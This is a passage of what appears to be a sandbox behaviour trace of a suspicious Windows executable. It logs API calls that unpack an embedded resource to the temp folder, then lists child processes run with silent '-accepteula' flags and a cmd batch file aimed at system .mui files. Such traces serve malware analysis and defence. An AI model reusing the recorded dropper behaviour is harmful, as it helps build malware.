!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÎ}¨Ñäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0249.044] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2c81f8 [0249.044] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0249.044] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0249.045] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2c81f8) returned 0x80 [0249.045] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0249.045] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0249.045] GetCurrentProcess () returned 0xffffffff [0249.045] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0249.045] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0249.045] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0249.045] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0249.045] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0249.045] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0249.046] LockResource (hResData=0x43c648) returned 0x43c648 [0249.046] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2c8280 [0249.046] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0249.047] GetLastError () returned 0x20 [0249.047] GetLastError () returned 0x20 [0249.047] SetLastError (dwErrCode=0x20) [0249.047] GetLastError () returned 0x20 [0249.047] SetLastError (dwErrCode=0x20) [0249.047] GetLastError () returned 0x20 [0249.047] SetLastError (dwErrCode=0x20) [0249.047] GetLastError () returned 0x20 [0249.047] SetLastError (dwErrCode=0x20) [0249.048] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1000) returned 0x2c97e8 [0249.048] GetLastError () returned 0x20 [0249.048] SetLastError (dwErrCode=0x20) [0249.048] GetLastError () returned 0x20 [0249.048] SetLastError (dwErrCode=0x20) [0249.049] GetLastError () returned 0x20 [0249.049] SetLastError (dwErrCode=0x20) [0249.049] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0249.049] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0249.052] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c77c8 | out: hHeap=0x2b0000) returned 1 [0249.052] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0249.052] ExitProcess (uExitCode=0x1) [0249.052] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c60b0 | out: hHeap=0x2b0000) returned 1 Process: id = "281" image_name = "tdq963ii64.exe" filename = "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe" page_root = "0x13404000" os_pid = "0x82c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "277" os_parent_pid = "0x644" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 903 os_tid = 0xb4c Process: id = "282" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x14f9f000" os_pid = "0xad4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "279" os_parent_pid = "0xacc" cmd_line = "tdq963ii.exe -accepteula \"MSPVWCTL.DLL.mui\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 904 os_tid = 0xaf4 Process: id = "283" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x173ca000" os_pid = "0x570" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]